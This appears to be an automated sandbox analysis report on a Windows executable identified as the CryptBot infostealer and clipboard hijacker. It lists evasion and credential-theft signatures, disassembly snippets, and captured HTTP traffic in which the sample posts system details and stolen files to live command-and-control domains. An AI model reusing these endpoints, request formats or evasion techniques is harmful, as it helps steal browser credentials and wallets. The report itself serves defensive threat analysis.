Windows Analysis Report
nRYpZg6i5E.exe

Overview

General Information

Sample name: nRYpZg6i5E.exe
renamed because original name is a hash value
Original sample name: 32418cf3b568237bee2ee252fa8ce7da.exe
Analysis ID: 1580276
MD5: 32418cf3b568237bee2ee252fa8ce7da
SHA1: c7760146c3fc6f02ab7d822eff5897cf159d847e
SHA256: 09b76dc51da0cea7038234dcf73916526d34c7401cb488d0ceb099cda4b369d9
Tags: exeuser-abuse_ch
Infos:

Detection

Clipboard Hijacker, Cryptbot
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Clipboard Hijacker
Yara detected Cryptbot
AI detected suspicious sample
Drops large PE files
Found evasive API chain (may stop execution after checking mutex)
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Name Description Attribution Blogpost URLs Link
CryptBot A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

AV Detection

barindex
Source: nRYpZg6i5E.exe Avira: detected
Source: http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=6Es4F8HJLlz9cVoX1735025759 Avira URL Cloud: Label: malware
Source: nRYpZg6i5E.exe Virustotal: Detection: 51% Perma Link
Source: nRYpZg6i5E.exe ReversingLabs: Detection: 44%
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: nRYpZg6i5E.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_009615B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 9_2_009615B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE414B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, 9_2_6BE414B0
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_36004eac-1
Source: nRYpZg6i5E.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\.ms-ad\ Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Google\ Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\ Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\ Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\ Jump to behavior
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: C:\Users\user\AppData\Local\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea ecx, dword ptr [esp+04h] 9_2_009681E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6BF1F960h 9_2_6BE5EB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6BE6A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6BE6A9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6BE6A970
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6BE60860
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6BEBAF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6BEBAF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6BEBAEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [6BF1D014h] 9_2_6BF14360
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6BE60260
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+04h] 9_2_6BE9A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6BEBC1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6BEBC040
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6BE60740
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, ecx 9_2_6BEE0730
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6BE6E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6BE6E6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6BE6A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6BE6A5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx+08h] 9_2_6BE6A580
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [ecx] 9_2_6BE6C510
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 9_2_6BEE84A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6BE64453
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 9_2_6BE7BBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 9_2_6BE7BBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 9_2_6BE99B60
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+04h] 9_2_6BE6D974
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 9_2_6BEB3840
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6BEBBD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push esi 9_2_6BEB7D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebx 9_2_6BED7350
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6BE6D2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6BE5B1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push edi 9_2_6BEE3140
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+08h] 9_2_6BE6D7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, 6BF1DFF4h 9_2_6BEB3690
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] 9_2_6BE6D674
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then mov eax, dword ptr [esp+04h] 9_2_6BEB9600
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then push ebp 9_2_6BE6D504
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 4x nop then sub esp, 1Ch 9_2_6BEBB4D0
Source: chrome.exe Memory has grown: Private usage: 15MB later: 27MB

Networking

barindex
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.11:49713 -> 185.121.15.192:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.11:49727 -> 185.121.15.192:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.11:49712 -> 185.121.15.192:80
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 559799Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 35 30 32 35 37 35 34 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 30 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 32 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 34 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 36 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 35 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 31 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 2
Source: global traffic HTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=6Es4F8HJLlz9cVoX1735025759 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 463Content-Type: multipart/form-data; boundary=------------------------RoH0e9jbgxmXOCeLE9bvZyData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 52 6f 48 30 65 39 6a 62 67 78 6d 58 4f 43 65 4c 45 39 62 76 5a 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 46 61 70 61 6c 61 71 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 3a 38 9d c3 26 49 ad 4a d9 ca 18 c9 b8 2a e3 15 19 63 08 dc 6a 34 ae 33 5d 75 3b f7 bd 1f 8d c3 46 a8 1b 68 49 78 16 24 fe e8 d5 57 ee 8b f1 c4 94 57 f6 d5 b8 7b 8c 42 bb 69 be 46 0a 36 b1 09 7f 40 7f 68 43 b2 8e d5 06 c7 c3 38 73 e9 35 7f 72 99 72 20 c1 7d 51 69 e6 9b 3f 70 e6 b6 55 00 92 9e 8b dc 6b ab 12 0f a1 21 00 5f d7 bb 71 af b6 9f b3 a5 c7 3c 9e 3d 8c e9 3d 27 29 49 8c cd f4 89 e4 11 47 c6 a1 c2 3a 75 a7 c3 b3 9a 25 8f bc 36 22 d7 43 c3 17 c0 09 20 fb 74 36 b5 00 57 32 ca a3 7a 55 42 d2 e5 06 72 7c 09 ef 8e 1e be d5 76 a7 70 7b 8a ea 4c 28 43 1e b6 da 53 e8 89 08 c0 4f d5 a0 dc f7 fd a3 6b ff 30 e5 de 4f ac 00 69 02 3b b3 01 c9 0a f4 ae 5e a5 bc a3 23 81 20 b3 90 42 e1 cd 21 96 0f 09 11 b3 09 53 f5 14 e3 09 cd 14 83 a7 ed 79 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 52 6f 48 30 65 39 6a 62 67 78 6d 58 4f 43 65 4c 45 39 62 76 5a 79 2d 2d 0d 0a Data Ascii: --------------------------RoH0e9jbgxmXOCeLE9bvZyContent-Disposition: form-data; name="file"; filename="Fapalaq.bin"Content-Type: application/octet-stream:8&IJ*cj43]u;FhIx$WW{BiF6@hC8s5rr }Qi?pUk!_q<==')IG:u%6"C t6W2zUBr|vp{L(CSOk0Oi;^# B!Sy--------------------------RoH0e9jbgxmXOCeLE9bvZy--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 90018Content-Type: multipart/form-data; boundary=------------------------1j2Aif3KkR9hRQkidVhcZbData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 6a 32 41 69 66 33 4b 6b 52 39 68 52 51 6b 69 64 56 68 63 5a 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 57 61 7a 61 68 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a e9 40 4f 8f 84 bc d0 ef 60 62 e3 6e b0 ca 41 c0 62 c1 81 a1 c1 2c 35 78 47 bd 98 e3 b3 41 1a 1a 14 b6 08 87 9d 69 7c 9b 85 8e e5 72 b6 ca 22 1a a8 b9 ec 8e ab 7d 87 c4 1a 7b 40 ff cb 67 7e 41 d9 da cf 19 83 19 e1 37 b2 80 4d b1 5f 6e 4d 7e 50 f4 f8 43 9e 6b 78 ab 44 8e 77 07 8c b2 03 b4 c8 53 7f 07 59 16 86 f6 2f ca ad 2d ff 79 ef 88 fe f5 a8 d8 e3 21 a5 e9 ed de 3b e8 9c 4b ed 73 90 2e 93 d6 1f 37 b2 63 2f 43 50 39 1a f5 08 94 95 fe c5 7d 56 75 a6 d0 a9 47 a7 2c d9 4e 15 e0 45 a2 5f b2 66 c8 97 da 16 2b 91 8e dc eb 92 26 bd b7 07 1d 09 fa 95 18 3b c6 37 38 4a c4 85 6e 72 8e 4a 66 1a 20 d2 39 f1 99 a5 8c 69 51 fe b6 f8 eb 44 f0 f6 54 ae 53 06 b3 6b fb 2f bf 0c c1 59 b6 da a5 70 28 c4 8a 0e 7b dd 0c d9 ec 32 0c 42 52 a9 ea d8 ff bd 77 21 21 ce 6b 83 a6 e0 d5 f6 79 69 cd ef a5 f7 e4 3c 8f 6c 2b d3 1a b2 c6 5d 7c 1d d0 22 4f 87 c7 f9 fe 55 14 63 9f 62 f3 0f da 03 24 ec e6 ad ad 7d 5a 2d c6 63 b9 89 7c f4 40 e2 5c 02 fa 91 bb 7f b2 30 15 86 3d 29 08 a3 bf 82 cc e7 89 33 dc 5c 9a a0 ae f8 1e 97 99 8d 4d df 25 39 c0 a0 3e 20 d0 98 b1 ce b7 4e 0c 53 e4 ba 36 1c 3e 89 b7 2f d9 69 c5 74 c6 9f c5 ce 55 2c 71 d9 5f ec d9 8a ea 8d 55 06 de 5a 0a ca c5 1d 30 e7 69 e7 5b ec fc ba 9c a7 77 95 ec 54 16 45 20 c6 e0 20 cf 67 74 74 b7 1d 23 a5 55 2a 52 71 76 8f 2b f2 e3 f8 7e e2 77 cf 3b 1e 34 51 6f 83 1e 48 7f 54 49 fc 60 72 56 3f a5 c3 b2 8b 64 9e 3b 33 ef 41 ca 32 d9 99 db a8 7e 40 52 b9 a9 5e cd cc 3a 7c 18 cd 5a 81 72 84 10 9a 7a 38 87 d3 63 80 8d 8f 3d 97 36 96 f6 a1 9a 05 4e d9 0e 45 6c 93 d5 93 c7 ab 4c e5 25 6d 6a be 92 48 a3 c0 c8 d7 fc f7 27 9a 83 f6 64 69 67 85 aa 41 69 40 1e f3 36 07 b6 ce 9c d7 de ab a1 9c 89 1e da 56 d9 fb 5a 08 f4 15 1b 83 d1 34 62 93 aa 55 af 4c 59 3e 61 87 f0 3c 26 33 f1 56 15 dc d0 12 5f 1d 41 ca 65 df e1 33 fb ac ca 5c 6f 07 64 f0 e6 72 66 f7 70 e8 78 4d ad 87 c3 3d 99 86 86 0e a5 5c 59 94 d1 fd c3 c0 78 7e 64 27 d0 37 4c 1f c1 6d 98 45 d2 63 d5 ad f7 65 89 27 25 44 bb 87 3e 85 93 fd d5 db 98 f2 36 83 db 7b 5c 14 4b 75 c6 80 9f 03 3a 09 f7 8a 68 3d 88 10 7c a3 20 70 d9 45 d0 d9 e5 d4 d2 1b cb 37 a5 6d 1f f3 dd cf ed b4 96 c9 f1 0a e8 9c 78 b7 68 c7 81 36 27 ef 76 c9 4b 0f ce b3 73 9e 4b ca 6a e9 c3 3d 05 d8 7a 00 d9 01 0a db a5 11 52 d0 12 94 69 ce 54 25 6f ce d7 91 7c 66 96 eb d4 34 21 a3 dd 68 1e 2a ec 36 1e 27 90 49 82 b0 02 bc 6e 00 6a 44 9c 49 3d 7b be da 0b 9a 21
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: twentytk20ht.topAccept: */*Content-Length: 32560Content-Type: multipart/form-data; boundary=------------------------Tv0LCBc8BDDVonkacS3zA5Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 54 76 30 4c 43 42 63 38 42 44 44 56 6f 6e 6b 61 63 53 33 7a 41 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 6f 78 6f 74 75 66 69 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 85 60 ee 28 09 69 7f 3c 3c 89 6f 72 a7 96 c7 5d 65 4f b3 0b 99 4d dd a8 0d 00 14 e4 3b 6d 18 b9 6d 8d d7 fc b2 85 46 fa bb 36 82 06 4d 5e 9d b2 1d 26 d4 ef f7 0a da 9f ea 06 81 34 58 36 cf 10 2a 66 f9 f5 ef 9f b2 78 bb 6e 98 d9 6c 09 ba 24 7c 92 ac 75 86 0a 53 0b e8 88 38 03 ae 63 32 f7 fc d9 83 fd 33 e4 91 65 03 9e e0 5c 7f 9e 7a de 5a 54 a0 41 a6 10 e5 da 9d c5 df c1 2d 9e 5e 05 72 2d 63 d9 31 5c f1 a9 54 94 7d 71 3b 87 d9 26 0a 34 55 09 ed e9 f6 47 d2 c1 33 b2 68 1e d1 61 e6 43 f5 fb db 05 67 9e 20 65 78 12 84 91 a1 6e 41 f6 c3 49 37 3f 94 61 78 73 be b2 c9 0b cf 75 e7 44 e7 bc 30 a7 6b 4d 37 cb 80 69 c6 46 65 90 7e 00 a5 3b 77 56 fc 87 6c 9f a5 2b 1d 85 ad 23 63 b1 63 1a b0 c7 cd ac 3c 4d 2d 11 70 f0 8f 63 d9 c0 2c 50 89 99 9a 11 84 29 3c 7a 7b 91 9e ac 77 8d 79 26 cd 38 c8 45 c5 ad c7 2c fe 3c a8 85 46 05 c3 11 70 79 e7 78 0e 00 0e b2 fc 85 7f 88 df 78 93 b3 f6 60 9e 0d 5c c5 25 44 c3 a9 22 67 6f 33 2f 64 c0 dc de ce 32 6d 75 08 10 21 46 cb 8f 70 3a 3c ab 71 5c 94 e2 af db 57 8c 6b d8 0f 7e 19 20 a5 27 fa 4b 51 d1 3c 5f 8e ff 97 92 ee ee 47 ed a9 74 b1 53 bc d8 ef 53 4f 54 44 35 00 12 69 0f 41 fd 63 21 e7 4e 0a 48 3c b9 7e 40 34 82 26 0e 8e 92 31 4f 38 5c 33 55 70 32 c7 51 fe 2d d7 5c b2 ac 68 b4 e0 24 42 a0 45 5e fb f0 aa 55 0b 15 e0 e9 17 1c ff 63 38 58 eb 30 76 90 1f a4 be fc 2a 83 53 be 1b fa 6c a2 71 2a d8 a5 02 6f 9a 52 40 f0 a4 6a 74 0c f0 0d a7 94 83 38 97 a6 13 48 e7 9f 43 3a ca 32 93 10 83 ad 7e 65 b3 b3 69 ef f9 40 2b 01 e7 6c bb 53 ad a2 4f 99 5b 9d 68 86 13 84 0a 55 b8 9b 99 02 a6 bf 79 23 21 fd ee 81 d5 0a ee 61 67 40 ef 8c ec 1f 45 91 30 fd d5 b5 d9 ca 68 f5 dc 06 a0 dc 13 2e 13 49 df 78 c6 59 2f c8 a4 86 77 35 7d b4 21 90 ed db b8 b1 c2 1e 00 73 28 f8 24 58 9f d9 52 e8 95 e2 c2 e0 af 7a 58 cf c6 28 51 39 38 ff 72 d1 59 0a 43 ae 14 13 06 de 4d cb 87 6d 4b 0a fd 3f 33 43 3e 8d c2 c3 39 35 7f de f1 aa b6 92 83 00 25 5a 60 5d e2 ac dc 28 3c b4 af fb 2a 68 fd 7e ea 84 4c 44 37 e8 de c2 ac 3a 55 4e 8e 7a 86 43 8d 91 e9 fc 00 11 df 43 d6 cb 88 b2 11 b3 de eb 19 36 d7 76 3d 9d 0e f4 0f ad f5 7f ca 8d c8 82 d9 46 2a 0f 86 23 ec 2a 37 dd 09 6a 51 a5 53 0e f8 bf d8 1d 31 b5 85 2f 05 2d 90 83 9c d0 cb e8 15 97 0d b1 cf d5 8e 43 f2 61 0f 93 35 e7 1a 44 b8 44 7b 29 9d 30 b9 67 79 f0 10 35 fb 02 3e 13 74 f7 d2 44 f4 b6 85 54 57 da f0 00 4e c3 f7 83 74 cc 27 aa f6 5d c0 aa 36
Source: global traffic HTTP traffic detected: POST /TQIuuaqjNpwYjtUvFojm1734579850 HTTP/1.1Host: home.twentytk20ht.topAccept: */*Content-Type: application/jsonContent-Length: 56Data Raw: 7b 20 22 69 64 31 22 3a 20 22 36 45 73 34 46 38 48 4a 4c 6c 7a 39 63 56 6f 58 31 37 33 35 30 32 35 37 35 39 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 32 22 20 7d Data Ascii: { "id1": "6Es4F8HJLlz9cVoX1735025759", "data": "Done2" }
Source: Joe Sandbox View IP Address: 185.121.15.192 185.121.15.192
Source: Joe Sandbox View IP Address: 34.226.108.155 34.226.108.155
Source: Joe Sandbox View IP Address: 239.255.255.250 239.255.255.250
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /ip HTTP/1.1Host: httpbin.orgAccept: */*
Source: global traffic HTTP traffic detected: GET /TQIuuaqjNpwYjtUvFojm1734579850?argument=6Es4F8HJLlz9cVoX1735025759 HTTP/1.1Host: home.twentytk20ht.topAccept: */*
